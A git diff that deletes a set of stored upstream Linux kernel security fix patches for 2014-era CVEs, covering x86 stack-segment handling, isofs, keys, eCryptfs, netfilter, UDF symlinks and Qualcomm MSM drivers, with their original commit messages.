-diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S -index 1a454d0..50e5e59 100644 ---- a/arch/x86/kernel/entry_64.S -+++ b/arch/x86/kernel/entry_64.S -@@ -1503,7 +1503,7 @@ - - paranoidzeroentry_ist debug do_debug DEBUG_STACK - paranoidzeroentry_ist int3 do_int3 DEBUG_STACK --paranoiderrorentry stack_segment do_stack_segment -+errorentry stack_segment do_stack_segment - #ifdef CONFIG_XEN - zeroentry xen_debug do_debug - zeroentry xen_int3 do_int3 -diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c -index 74e0801..00a2873 100644 ---- a/arch/x86/kernel/traps.c -+++ b/arch/x86/kernel/traps.c -@@ -220,28 +220,12 @@ - coprocessor_segment_overrun) - DO_ERROR(X86_TRAP_TS, SIGSEGV, "invalid TSS", invalid_TSS) - DO_ERROR(X86_TRAP_NP, SIGBUS, "segment not present", segment_not_present) --#ifdef CONFIG_X86_32 - DO_ERROR(X86_TRAP_SS, SIGBUS, "stack segment", stack_segment) --#endif - DO_ERROR_INFO(X86_TRAP_AC, SIGBUS, "alignment check", alignment_check, - BUS_ADRALN, 0) - - #ifdef CONFIG_X86_64 - /* Runs on IST stack */ --dotraplinkage void do_stack_segment(struct pt_regs *regs, long error_code) --{ -- enum ctx_state prev_state; -- -- prev_state = exception_enter(); -- if (notify_die(DIE_TRAP, "stack segment", regs, error_code, -- X86_TRAP_SS, SIGBUS) != NOTIFY_STOP) { -- preempt_conditional_sti(regs); -- do_trap(X86_TRAP_SS, SIGBUS, "stack segment", regs, error_code, NULL); -- preempt_conditional_cli(regs); -- } -- exception_exit(prev_state); --} -- - dotraplinkage void do_double_fault(struct pt_regs *regs, long error_code) - { - static const char str[] = "double fault"; -@@ -769,7 +753,7 @@ - set_intr_gate(X86_TRAP_OLD_MF, &coprocessor_segment_overrun); - set_intr_gate(X86_TRAP_TS, &invalid_TSS); - set_intr_gate(X86_TRAP_NP, &segment_not_present); -- set_intr_gate_ist(X86_TRAP_SS, &stack_segment, STACKFAULT_STACK); -+ set_intr_gate(X86_TRAP_SS, stack_segment); - set_intr_gate(X86_TRAP_GP, &general_protection); - set_intr_gate(X86_TRAP_SPURIOUS, 
&spurious_interrupt_bug); - set_intr_gate(X86_TRAP_MF, &coprocessor_error); diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch.base64 deleted file mode 100644 index ac00d8ff..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0010.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch deleted file mode 100644 index e0d68a85..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/arch/x86/kernel/tls.c b/arch/x86/kernel/tls.c -index f7fec09..e7650bd 100644 ---- a/arch/x86/kernel/tls.c -+++ b/arch/x86/kernel/tls.c -@@ -27,6 +27,21 @@ - return -ESRCH; - } - -+static bool tls_desc_okay(const struct user_desc *info) -+{ -+ if (LDT_empty(info)) -+ return true; -+ -+ /* -+ * espfix is required for 16-bit data segments, but espfix -+ * only works for LDT segments. -+ */ -+ if (!info->seg_32bit) -+ return false; -+ -+ return true; -+} -+ - static void set_tls_desc(struct task_struct *p, int idx, - const struct user_desc *info, int n) - { -@@ -66,6 +81,9 @@ - if (copy_from_user(&info, u_info, sizeof(info))) - return -EFAULT; - -+ if (!tls_desc_okay(&info)) -+ return -EINVAL; -+ - if (idx == -1) - idx = info.entry_number; - -@@ -192,6 +210,7 @@ - { - struct user_desc infobuf[GDT_ENTRY_TLS_ENTRIES]; - const struct user_desc *info; -+ int i; - - if (pos >= GDT_ENTRY_TLS_ENTRIES * sizeof(struct user_desc) || - (pos % sizeof(struct user_desc)) != 0 || -@@ -205,6 +224,10 @@ - else - info = infobuf; - -+ for (i = 0; i < count / sizeof(struct user_desc); i++) -+ if (!tls_desc_okay(info + i)) -+ return -EINVAL; -+ - set_tls_desc(target, - GDT_ENTRY_TLS_MIN + (pos / sizeof(struct user_desc)), - info, count / sizeof(struct user_desc)); 
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch.base64
deleted file mode 100644
index db0dc128..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9420/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9420/ANY/0001.patch
deleted file mode 100644
index df3a5299..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9420/ANY/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@ -From f54e18f1b831c92f6512d2eedb224cd63d607d3d Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Mon, 15 Dec 2014 14:22:46 +0100 -Subject: isofs: Fix infinite looping over CE entries - -Rock Ridge extensions define so called Continuation Entries (CE) which -define where is further space with Rock Ridge data. Corrupted isofs -image can contain arbitrarily long chain of these, including a one -containing loop and thus causing kernel to end in an infinite loop when -traversing these entries. - -Limit the traversal to 32 entries which should be more than enough space -to store all the Rock Ridge data. - -Reported-by: P J P -CC: stable@vger.kernel.org -Signed-off-by: Jan Kara ---- - fs/isofs/rock.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/fs/isofs/rock.c b/fs/isofs/rock.c -index f488bba..bb63254 100644 ---- a/fs/isofs/rock.c -+++ b/fs/isofs/rock.c -@@ -30,6 +30,7 @@ struct rock_state { - int cont_size; - int cont_extent; - int cont_offset; -+ int cont_loops; - struct inode *inode; - }; - -@@ -73,6 +74,9 @@ static void init_rock_state(struct rock_state *rs, struct inode *inode) - rs->inode = inode; - } - -+/* Maximum number of Rock Ridge continuation entries */ -+#define RR_MAX_CE_ENTRIES 32 -+ - /* - * Returns 0 if the caller should continue scanning, 1 if the scan must end - * and -ve on error. -@@ -105,6 +109,8 @@ static int rock_continue(struct rock_state *rs) - goto out; - } - ret = -EIO; -+ if (++rs->cont_loops >= RR_MAX_CE_ENTRIES) -+ goto out; - bh = sb_bread(rs->inode->i_sb, rs->cont_extent); - if (bh) { - memcpy(rs->buffer, bh->b_data + rs->cont_offset, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9529/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9529/ANY/0001.patch deleted file mode 100644 index 86efe5aa..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9529/ANY/0001.patch +++ /dev/null 
@@ -1,47 +0,0 @@ -From a3a8784454692dd72e5d5d34dcdab17b4420e74c Mon Sep 17 00:00:00 2001 -From: Sasha Levin -Date: Mon, 29 Dec 2014 09:39:01 -0500 -Subject: KEYS: close race between key lookup and freeing - -When a key is being garbage collected, it's key->user would get put before -the ->destroy() callback is called, where the key is removed from it's -respective tracking structures. - -This leaves a key hanging in a semi-invalid state which leaves a window open -for a different task to try an access key->user. An example is -find_keyring_by_name() which would dereference key->user for a key that is -in the process of being garbage collected (where key->user was freed but -->destroy() wasn't called yet - so it's still present in the linked list). - -This would cause either a panic, or corrupt memory. - -Fixes CVE-2014-9529. - -Signed-off-by: Sasha Levin -Signed-off-by: David Howells ---- - security/keys/gc.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/security/keys/gc.c b/security/keys/gc.c -index 9609a7f..c795237 100644 ---- a/security/keys/gc.c -+++ b/security/keys/gc.c -@@ -148,12 +148,12 @@ static noinline void key_gc_unused_keys(struct list_head *keys) - if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags)) - atomic_dec(&key->user->nikeys); - -- key_user_put(key->user); -- - /* now throw away the key memory */ - if (key->type->destroy) - key->type->destroy(key); - -+ key_user_put(key->user); -+ - kfree(key->description); - - #ifdef KEY_DEBUGGING --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9683/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-9683/3.2/0001.patch deleted file mode 100644 index 38919fbe..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9683/3.2/0001.patch +++ /dev/null 
@@ -1,37 +0,0 @@ -From f2d130454e46c3989af1b4f882b6a666d24fa2e0 Mon Sep 17 00:00:00 2001 -From: Michael Halcrow -Date: Wed, 26 Nov 2014 09:09:16 -0800 -Subject: eCryptfs: Remove buggy and unnecessary write in file name decode - routine - -commit 942080643bce061c3dd9d5718d3b745dcb39a8bc upstream. - -Dmitry Chernenkov used KASAN to discover that eCryptfs writes past the -end of the allocated buffer during encrypted filename decoding. This -fix corrects the issue by getting rid of the unnecessary 0 write when -the current bit offset is 2. - -Signed-off-by: Michael Halcrow -Reported-by: Dmitry Chernenkov -Suggested-by: Kees Cook -Signed-off-by: Tyler Hicks -Signed-off-by: Ben Hutchings ---- - fs/ecryptfs/crypto.c | 1 - - 1 file changed, 1 deletion(-) - -diff --git a/fs/ecryptfs/crypto.c b/fs/ecryptfs/crypto.c -index 68b19ab..dceedec 100644 ---- a/fs/ecryptfs/crypto.c -+++ b/fs/ecryptfs/crypto.c -@@ -2038,7 +2038,6 @@ ecryptfs_decode_from_filename(unsigned char *dst, size_t *dst_size, - break; - case 2: - dst[dst_byte_offset++] |= (src_byte); -- dst[dst_byte_offset] = 0; - current_bit_offset = 0; - break; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9683/^3.18/0002.patch b/Patches/Linux_CVEs/CVE-2014-9683/^3.18/0002.patch deleted file mode 100644 index 31e9f402..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9683/^3.18/0002.patch +++ /dev/null 
@@ -1,32 +0,0 @@ -From 942080643bce061c3dd9d5718d3b745dcb39a8bc Mon Sep 17 00:00:00 2001 -From: Michael Halcrow -Date: Wed, 26 Nov 2014 09:09:16 -0800 -Subject: [PATCH] eCryptfs: Remove buggy and unnecessary write in file name - decode routine - -Dmitry Chernenkov used KASAN to discover that eCryptfs writes past the -end of the allocated buffer during encrypted filename decoding. This -fix corrects the issue by getting rid of the unnecessary 0 write when -the current bit offset is 2. - -Signed-off-by: Michael Halcrow -Reported-by: Dmitry Chernenkov -Suggested-by: Kees Cook -Cc: stable@vger.kernel.org # v2.6.29+: 51ca58d eCryptfs: Filename Encryption: Encoding and encryption functions -Signed-off-by: Tyler Hicks ---- - fs/ecryptfs/crypto.c | 1 - - 1 file changed, 1 deletion(-) - -diff --git a/fs/ecryptfs/crypto.c b/fs/ecryptfs/crypto.c -index 2f6735dbf1a9d..31b148f3e7729 100644 ---- a/fs/ecryptfs/crypto.c -+++ b/fs/ecryptfs/crypto.c -@@ -1917,7 +1917,6 @@ ecryptfs_decode_from_filename(unsigned char *dst, size_t *dst_size, - break; - case 2: - dst[dst_byte_offset++] |= (src_byte); -- dst[dst_byte_offset] = 0; - current_bit_offset = 0; - break; - } diff --git a/Patches/Linux_CVEs/CVE-2014-9715/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-9715/3.2/0001.patch deleted file mode 100644 index 3f7042c9..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9715/3.2/0001.patch +++ /dev/null 
@@ -1,56 +0,0 @@ -From 33eedfe8ecbaabcdc38be63901cb2b79e3190fda Mon Sep 17 00:00:00 2001 -From: Andrey Vagin -Date: Fri, 28 Mar 2014 13:54:32 +0400 -Subject: netfilter: nf_conntrack: reserve two bytes for nf_ct_ext->len - -commit 223b02d923ecd7c84cf9780bb3686f455d279279 upstream. - -"len" contains sizeof(nf_ct_ext) and size of extensions. In a worst -case it can contain all extensions. Bellow you can find sizes for all -types of extensions. Their sum is definitely bigger than 256. - -nf_ct_ext_types[0]->len = 24 -nf_ct_ext_types[1]->len = 32 -nf_ct_ext_types[2]->len = 24 -nf_ct_ext_types[3]->len = 32 -nf_ct_ext_types[4]->len = 152 -nf_ct_ext_types[5]->len = 2 -nf_ct_ext_types[6]->len = 16 -nf_ct_ext_types[7]->len = 8 - -I have seen "len" up to 280 and my host has crashes w/o this patch. - -The right way to fix this problem is reducing the size of the ecache -extension (4) and Florian is going to do this, but these changes will -be quite large to be appropriate for a stable tree. - -Fixes: 5b423f6a40a0 (netfilter: nf_conntrack: fix racy timer handling with reliable) -Cc: Pablo Neira Ayuso -Cc: Patrick McHardy -Cc: Jozsef Kadlecsik -Cc: "David S. Miller" -Signed-off-by: Andrey Vagin -Signed-off-by: Pablo Neira Ayuso -Signed-off-by: Ben Hutchings ---- - include/net/netfilter/nf_conntrack_extend.h | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/include/net/netfilter/nf_conntrack_extend.h b/include/net/netfilter/nf_conntrack_extend.h -index 2dcf317..d918074 100644 ---- a/include/net/netfilter/nf_conntrack_extend.h -+++ b/include/net/netfilter/nf_conntrack_extend.h -@@ -33,8 +33,8 @@ enum nf_ct_ext_id { - /* Extensions: optional stuff which isn't permanently in struct. */ - struct nf_ct_ext { - struct rcu_head rcu; -- u8 offset[NF_CT_EXT_NUM]; -- u8 len; -+ u16 offset[NF_CT_EXT_NUM]; -+ u16 len; - char data[0]; - }; - --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2014-9715/^3.14/0002.patch b/Patches/Linux_CVEs/CVE-2014-9715/^3.14/0002.patch
deleted file mode 100644
index 6b1c6df4..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9715/^3.14/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@ -From 223b02d923ecd7c84cf9780bb3686f455d279279 Mon Sep 17 00:00:00 2001 -From: Andrey Vagin -Date: Fri, 28 Mar 2014 13:54:32 +0400 -Subject: [PATCH] netfilter: nf_conntrack: reserve two bytes for nf_ct_ext->len - -"len" contains sizeof(nf_ct_ext) and size of extensions. In a worst -case it can contain all extensions. Bellow you can find sizes for all -types of extensions. Their sum is definitely bigger than 256. - -nf_ct_ext_types[0]->len = 24 -nf_ct_ext_types[1]->len = 32 -nf_ct_ext_types[2]->len = 24 -nf_ct_ext_types[3]->len = 32 -nf_ct_ext_types[4]->len = 152 -nf_ct_ext_types[5]->len = 2 -nf_ct_ext_types[6]->len = 16 -nf_ct_ext_types[7]->len = 8 - -I have seen "len" up to 280 and my host has crashes w/o this patch. - -The right way to fix this problem is reducing the size of the ecache -extension (4) and Florian is going to do this, but these changes will -be quite large to be appropriate for a stable tree. - -Fixes: 5b423f6a40a0 (netfilter: nf_conntrack: fix racy timer handling with reliable) -Cc: Pablo Neira Ayuso -Cc: Patrick McHardy -Cc: Jozsef Kadlecsik -Cc: "David S. Miller" -Signed-off-by: Andrey Vagin -Signed-off-by: Pablo Neira Ayuso ---- - include/net/netfilter/nf_conntrack_extend.h | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/include/net/netfilter/nf_conntrack_extend.h b/include/net/netfilter/nf_conntrack_extend.h -index 956b175523ffa..55d15049ab2fd 100644 ---- a/include/net/netfilter/nf_conntrack_extend.h -+++ b/include/net/netfilter/nf_conntrack_extend.h -@@ -47,8 +47,8 @@ enum nf_ct_ext_id { - /* Extensions: optional stuff which isn't permanently in struct. */ - struct nf_ct_ext { - struct rcu_head rcu; -- u8 offset[NF_CT_EXT_NUM]; -- u8 len; -+ u16 offset[NF_CT_EXT_NUM]; -+ u16 len; - char data[0]; - }; - diff --git a/Patches/Linux_CVEs/CVE-2014-9731/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9731/ANY/0001.patch deleted file mode 100644 index 60b78c75..00000000 
--- a/Patches/Linux_CVEs/CVE-2014-9731/ANY/0001.patch
+++ /dev/null
@@ -1,236 +0,0 @@
-From 0e5cc9a40ada6046e6bc3bdfcd0c0d7e4b706b14 Mon Sep 17 00:00:00 2001
-From: Jan Kara
-Date: Thu, 18 Dec 2014 22:37:50 +0100
-Subject: udf: Check path length when reading symlink
-
-Symlink reading code does not check whether the resulting path fits into
-the page provided by the generic code. This isn't as easy as just
-checking the symlink size because of various encoding conversions we
-perform on path. So we have to check whether there is still enough space
-in the buffer on the fly.
-
-CC: stable@vger.kernel.org
-Reported-by: Carl Henrik Lunde
-Signed-off-by: Jan Kara
----
- fs/udf/dir.c | 3 ++-
- fs/udf/namei.c | 3 ++-
- fs/udf/symlink.c | 31 ++++++++++++++++++++++++++-----
- fs/udf/udfdecl.h | 3 ++-
- fs/udf/unicode.c | 28 ++++++++++++++++------------
- 5 files changed, 48 insertions(+), 20 deletions(-)
-
-diff --git a/fs/udf/dir.c b/fs/udf/dir.c
-index a012c51..a7690b4 100644
---- a/fs/udf/dir.c
-+++ b/fs/udf/dir.c
-@@ -167,7 +167,8 @@ static int udf_readdir(struct file *file, struct dir_context *ctx)
- continue;
- }
-
-- flen = udf_get_filename(dir->i_sb, nameptr, fname, lfi);
-+ flen = udf_get_filename(dir->i_sb, nameptr, lfi, fname,
-+ UDF_NAME_LEN);
- if (!flen)
- continue;
-
-diff --git a/fs/udf/namei.c b/fs/udf/namei.c
-index c12e260..6ff19b5 100644
---- a/fs/udf/namei.c
-+++ b/fs/udf/namei.c
-@@ -233,7 +233,8 @@ static struct fileIdentDesc *udf_find_entry(struct inode *dir,
- if (!lfi)
- continue;
-
-- flen = udf_get_filename(dir->i_sb, nameptr, fname, lfi);
-+ flen = udf_get_filename(dir->i_sb, nameptr, lfi, fname,
-+ UDF_NAME_LEN);
- if (flen && udf_match(flen, fname, child->len, child->name))
- goto out_ok;
- }
-diff --git a/fs/udf/symlink.c b/fs/udf/symlink.c
-index c3aa6fa..0f1b3a2 100644
---- a/fs/udf/symlink.c
-+++ b/fs/udf/symlink.c
-@@ -30,13 +30,16 @@
- #include
- #include "udf_i.h"
-
--static void udf_pc_to_char(struct super_block *sb, unsigned char *from,
-- int fromlen, unsigned char *to)
-+static int udf_pc_to_char(struct super_block *sb, unsigned char *from,
-+ int fromlen, unsigned char *to, int tolen)
- {
- struct pathComponent *pc;
- int elen = 0;
-+ int comp_len;
- unsigned char *p = to;
-
-+ /* Reserve one byte for terminating \0 */
-+ tolen--;
- while (elen < fromlen) {
- pc = (struct pathComponent *)(from + elen);
- switch (pc->componentType) {
-@@ -49,22 +52,37 @@ static void udf_pc_to_char(struct super_block *sb, unsigned char *from,
- break;
- /* Fall through */
- case 2:
-+ if (tolen == 0)
-+ return -ENAMETOOLONG;
- p = to;
- *p++ = '/';
-+ tolen--;
- break;
- case 3:
-+ if (tolen < 3)
-+ return -ENAMETOOLONG;
- memcpy(p, "../", 3);
- p += 3;
-+ tolen -= 3;
- break;
- case 4:
-+ if (tolen < 2)
-+ return -ENAMETOOLONG;
- memcpy(p, "./", 2);
- p += 2;
-+ tolen -= 2;
- /* that would be . - just ignore */
- break;
- case 5:
-- p += udf_get_filename(sb, pc->componentIdent, p,
-- pc->lengthComponentIdent);
-+ comp_len = udf_get_filename(sb, pc->componentIdent,
-+ pc->lengthComponentIdent,
-+ p, tolen);
-+ p += comp_len;
-+ tolen -= comp_len;
-+ if (tolen == 0)
-+ return -ENAMETOOLONG;
- *p++ = '/';
-+ tolen--;
- break;
- }
- elen += sizeof(struct pathComponent) + pc->lengthComponentIdent;
-@@ -73,6 +91,7 @@ static void udf_pc_to_char(struct super_block *sb, unsigned char *from,
- p[-1] = '\0';
- else
- p[0] = '\0';
-+ return 0;
- }
-
- static int udf_symlink_filler(struct file *file, struct page *page)
-@@ -108,8 +127,10 @@ static int udf_symlink_filler(struct file *file, struct page *page)
- symlink = bh->b_data;
- }
-
-- udf_pc_to_char(inode->i_sb, symlink, inode->i_size, p);
-+ err = udf_pc_to_char(inode->i_sb, symlink, inode->i_size, p, PAGE_SIZE);
- brelse(bh);
-+ if (err)
-+ goto out_unlock_inode;
-
- up_read(&iinfo->i_data_sem);
- SetPageUptodate(page);
-diff --git a/fs/udf/udfdecl.h b/fs/udf/udfdecl.h
-index 1cc3c99..47bb3f5 100644
---- a/fs/udf/udfdecl.h
-+++ b/fs/udf/udfdecl.h
-@@ -211,7 +211,8 @@ udf_get_lb_pblock(struct super_block *sb, struct kernel_lb_addr *loc,
- }
-
- /* unicode.c */
--extern int udf_get_filename(struct super_block *, uint8_t *, uint8_t *, int);
-+extern int udf_get_filename(struct super_block *, uint8_t *, int, uint8_t *,
-+ int);
- extern int udf_put_filename(struct super_block *, const uint8_t *, uint8_t *,
- int);
- extern int udf_build_ustr(struct ustr *, dstring *, int);
-diff --git a/fs/udf/unicode.c b/fs/udf/unicode.c
-index afd470e..b84fee3 100644
---- a/fs/udf/unicode.c
-+++ b/fs/udf/unicode.c
-@@ -28,7 +28,8 @@
-
- #include "udf_sb.h"
-
--static int udf_translate_to_linux(uint8_t *, uint8_t *, int, uint8_t *, int);
-+static int udf_translate_to_linux(uint8_t *, int, uint8_t *, int, uint8_t *,
-+ int);
-
- static int udf_char_to_ustr(struct ustr *dest, const uint8_t *src, int strlen)
- {
-@@ -333,8 +334,8 @@ try_again:
- return u_len + 1;
- }
-
--int udf_get_filename(struct super_block *sb, uint8_t *sname, uint8_t *dname,
-- int flen)
-+int udf_get_filename(struct super_block *sb, uint8_t *sname, int slen,
-+ uint8_t *dname, int dlen)
- {
- struct ustr *filename, *unifilename;
- int len = 0;
-@@ -347,7 +348,7 @@ int udf_get_filename(struct super_block *sb, uint8_t *sname, uint8_t *dname,
- if (!unifilename)
- goto out1;
-
-- if (udf_build_ustr_exact(unifilename, sname, flen))
-+ if (udf_build_ustr_exact(unifilename, sname, slen))
- goto out2;
-
- if (UDF_QUERY_FLAG(sb, UDF_FLAG_UTF8)) {
-@@ -366,7 +367,8 @@ int udf_get_filename(struct super_block *sb, uint8_t *sname, uint8_t *dname,
- } else
- goto out2;
-
-- len = udf_translate_to_linux(dname, filename->u_name, filename->u_len,
-+ len = udf_translate_to_linux(dname, dlen,
-+ filename->u_name, filename->u_len,
- unifilename->u_name, unifilename->u_len);
- out2:
- kfree(unifilename);
-@@ -403,10 +405,12 @@ int udf_put_filename(struct super_block *sb, const uint8_t *sname,
- #define EXT_MARK '.'
- #define CRC_MARK '#'
- #define EXT_SIZE 5
-+/* Number of chars we need to store generated CRC to make filename unique */
-+#define CRC_LEN 5
-
--static int udf_translate_to_linux(uint8_t *newName, uint8_t *udfName,
-- int udfLen, uint8_t *fidName,
-- int fidNameLen)
-+static int udf_translate_to_linux(uint8_t *newName, int newLen,
-+ uint8_t *udfName, int udfLen,
-+ uint8_t *fidName, int fidNameLen)
- {
- int index, newIndex = 0, needsCRC = 0;
- int extIndex = 0, newExtIndex = 0, hasExt = 0;
-@@ -439,7 +443,7 @@ static int udf_translate_to_linux(uint8_t *newName, uint8_t *udfName,
- newExtIndex = newIndex;
- }
- }
-- if (newIndex < 256)
-+ if (newIndex < newLen)
- newName[newIndex++] = curr;
- else
- needsCRC = 1;
-@@ -467,13 +471,13 @@ static int udf_translate_to_linux(uint8_t *newName, uint8_t *udfName,
- }
- ext[localExtIndex++] = curr;
- }
-- maxFilenameLen = 250 - localExtIndex;
-+ maxFilenameLen = newLen - CRC_LEN - localExtIndex;
- if (newIndex > maxFilenameLen)
- newIndex = maxFilenameLen;
- else
- newIndex = newExtIndex;
-- } else if (newIndex > 250)
-- newIndex = 250;
-+ } else if (newIndex > newLen - CRC_LEN)
-+ newIndex = newLen - CRC_LEN;
- newName[newIndex++] = CRC_MARK;
- valueCRC = crc_itu_t(0, fidName, fidNameLen);
- newName[newIndex++] = hex_asc_upper_hi(valueCRC >> 8);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9777/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9777/ANY/0001.patch
deleted file mode 100644
index 08e16400..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9777/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 17bfaf64ad503d2e6607d2d3e0956f25bf07eb43 Mon Sep 17 00:00:00 2001
-From: "Pachika, Vikas Reddy"
-Date: Tue, 5 Nov 2013 12:48:36 +0530
-Subject: msm: vidc: Validate userspace buffer count before using it
-
-Validate the number of buffers count variable before
-using it to avoid structure overflow error.
-
-Change-Id: I61582c93e0f26ec6842e437134fb8a42bdbc36ff
-CRs-fixed: 563654
-Signed-off-by: Pachika, Vikas Reddy
----
- drivers/video/msm/vidc/common/dec/vdec.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/video/msm/vidc/common/dec/vdec.c b/drivers/video/msm/vidc/common/dec/vdec.c
-index a843889..83adec6 100644
---- a/drivers/video/msm/vidc/common/dec/vdec.c
-+++ b/drivers/video/msm/vidc/common/dec/vdec.c
-@@ -948,6 +948,12 @@ static u32 vid_dec_set_meta_buffers(struct video_client_ctx *client_ctx,
- vcd_meta_buffer->offset = meta_buffers->offset;
- vcd_meta_buffer->pmem_fd_iommu = meta_buffers->pmem_fd_iommu;
-
-+ if (meta_buffers->count > MAX_META_BUFFERS) {
-+ ERR("meta buffers maximum count reached, count = %d",
-+ meta_buffers->count);
-+ return false;
-+ }
-+
- if (!vcd_get_ion_status()) {
- if (get_pmem_file(vcd_meta_buffer->pmem_fd,
- (unsigned long *) (&(vcd_meta_buffer->
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9778/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9778/ANY/0001.patch
deleted file mode 100644
index 3d3613c3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9778/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From af85054aa6a1bcd38be2354921f2f80aef1440e5 Mon Sep 17 00:00:00 2001
-From: "Pachika, Vikas Reddy"
-Date: Fri, 1 Nov 2013 21:06:37 +0530
-Subject: msm: vidc: Validate userspace buffer count
-
-Makesure the number of buffers count is less than
-the maximum limit to avoid structure overflow errors.
-
-Change-Id: Icf3850de36325637ae43ac95f1c8f0f63e201d31
-CRs-fixed: 563694
-Signed-off-by: Pachika, Vikas Reddy
----
- drivers/video/msm/vidc/common/dec/vdec.c | 6 ++++++
- include/media/msm/vidc_init.h | 1 +
- 2 files changed, 7 insertions(+)
-
-diff --git a/drivers/video/msm/vidc/common/dec/vdec.c b/drivers/video/msm/vidc/common/dec/vdec.c
-index a843889..b45100f 100644
---- a/drivers/video/msm/vidc/common/dec/vdec.c
-+++ b/drivers/video/msm/vidc/common/dec/vdec.c
-@@ -1201,6 +1201,12 @@ static u32 vid_dec_set_h264_mv_buffers(struct video_client_ctx *client_ctx,
- vcd_h264_mv_buffer->pmem_fd = mv_data->pmem_fd;
- vcd_h264_mv_buffer->offset = mv_data->offset;
-
-+ if (mv_data->count > MAX_MV_BUFFERS) {
-+ ERR("MV buffers maximum count reached, count = %d",
-+ mv_data->count);
-+ return false;
-+ }
-+
- if (!vcd_get_ion_status()) {
- if (get_pmem_file(vcd_h264_mv_buffer->pmem_fd,
- (unsigned long *) (&(vcd_h264_mv_buffer->
-diff --git a/include/media/msm/vidc_init.h b/include/media/msm/vidc_init.h
-index c35f770..5df0c3e 100644
---- a/include/media/msm/vidc_init.h
-+++ b/include/media/msm/vidc_init.h
-@@ -20,6 +20,7 @@
- #define VIDC_MAX_NUM_CLIENTS 4
- #define MAX_VIDEO_NUM_OF_BUFF 100
- #define MAX_META_BUFFERS 32
-+#define MAX_MV_BUFFERS 32
-
- enum buffer_dir {
- BUFFER_TYPE_INPUT,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9779/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9779/ANY/0001.patch
deleted file mode 100644
index 1707a9db..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9779/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 0b5f49b360afdebf8ef55df1e48ec141b3629621 Mon Sep 17 00:00:00 2001
-From: Fred Oh
-Date: Fri, 11 Oct 2013 15:07:45 -0700
-Subject: ASoc: msm: qdsp6v2: add vm page offset validation
-
-Lack of range validation can lead wrong mapping or expose arbitrary
-memory page to userspace
-
-Change-Id: I8c6eb1b7255d444bffd9d3748ca4815b11bdf16a
-Signed-off-by: Fred Oh
----
- arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-(limited to 'arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c')
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-index 0a50bcc..2d375ac 100644
---- a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-+++ b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-@@ -269,6 +269,7 @@ int msm_audio_ion_mmap(struct audio_buffer *ab,
- } else {
- ion_phys_addr_t phys_addr;
- size_t phys_len;
-+ size_t va_len = 0;
- pr_debug("%s: page is NULL\n", __func__);
-
- ret = ion_phys(ab->client, ab->handle, &phys_addr, &phys_len);
-@@ -282,6 +283,12 @@ int msm_audio_ion_mmap(struct audio_buffer *ab,
- vma, (unsigned int)vma->vm_start,
- (unsigned int)vma->vm_end, vma->vm_pgoff,
- (unsigned long int)vma->vm_page_prot);
-+ va_len = vma->vm_end - vma->vm_start;
-+ if ((offset > phys_len) || (va_len > phys_len-offset)) {
-+ pr_err("wrong offset size %ld, lens= %d, va_len=%d\n",
-+ offset, phys_len, va_len);
-+ return -EINVAL;
-+ }
